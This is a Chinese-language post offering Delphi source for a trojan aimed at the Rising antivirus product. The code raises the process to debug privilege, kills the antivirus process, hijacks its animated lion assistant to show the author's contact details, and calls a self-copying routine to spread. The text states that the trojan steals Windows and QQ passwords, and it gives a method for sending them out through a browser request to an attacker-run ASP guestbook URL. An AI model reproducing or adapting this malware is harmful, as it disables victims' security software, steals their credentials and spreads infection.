专杀瑞星进程功能的木马的delphi原代码

下面为该木马增加以下代码，实现杀瑞星的功能的木马。
专杀瑞星的进程，然后删除瑞星程序，将瑞星主程序替换为木马，自动监视系统，抓取windows和QQ密码
同时把瑞星的狮子替换成自己语句控制Agent

{以下代码杀瑞星的进程}
GetPrivilege(\'SeDebugPrivilege\');//这个是修改权限的函数
llhwnd:=OpenProcess(PROCESS_ALL_ACCESS,True,strtoint(rav[0])); //根据PID获得瑞星进程句柄
ll:=TerminateProcess(llhwnd,0);//杀瑞星的进程

{以下代码控制瑞星助手}
procedure TTM.RsAgent();
begin
Request1 := TMLiAgent.Characters.Load(\'TMLi\',\'c:\\rav\\RsAgent.acs\');//读入瑞星狮子
TMLi := TMLiAgent.Characters.Character( \'TMLi\' );
top:=-500;//隐藏木马本身程序
TMLi.Show(0);//调出瑞星狮子
TMLi.Commands.Add(\'提取windows密码\',\'提取windows密码\',\'提取windows密码\',True,True);//添加菜单
TMLi.MoveTo((mouse.CursorPos.x-TMLi.Get_Width), (mouse.CursorPos.y-TMLi.Get_Height),1);
TMLi.Speak(\'本狮子现已不再是瑞星助手了，已经改户口为：TML超级叮当，QQ48505，群号：1787781。\',\'\');//控制狮子说话
TMLi.Play(\'Surprised\');//控制狮子动作
try
copyself();//继续感染系统
except
end;
end;

{以下代码为修改权限的函数，以杀瑞星}
function GetPrivilege(PrivilegeType: PChar): longbool; stdcall;//这个是修改权限的函数
var
hToken : THandle;
tkp : TTokenPrivileges;
a: DWORD;
ll:longbool;
begin
OpenProcessToken( GetCurrentProcess(), TOKEN_ADJUST_PRIVILEGES or TOKEN_QUERY, hToken);
tkp.PrivilegeCount := 1;
  ll:=LookupPrivilegeValue( nil,PrivilegeType , tkp.Privileges[ 0 ].Luid );
if PrivilegeType=\'SeDebugPrivilege\' then
begin
  ll:=LookupPrivilegeValue( nil,PrivilegeType , tkp.Privileges[ 0 ].Luid );
  tkp.Privileges[ 0 ].Attributes := SE_PRIVILEGE_ENABLED;
end;
a:=0;
AdjustTokenPrivileges( hToken, False, tkp, SizeOf( TTokenPrivileges ), nil, a);
CloseHandle(hToken);
end;

密码发送就是访问IE网址
随便申请个ASP留言版地址，记录上信息，就OK，非常简单
一般ASP留言版都用Username等信息
具体代码为WebBrowser1.Navigate(\'随便申请个留言版地址+\'?username=系统密码&email=tml@qq.com&……);
然后随时去看留言版，看到email=tml@qq.com这种类型,就知道是木马发来的密码了。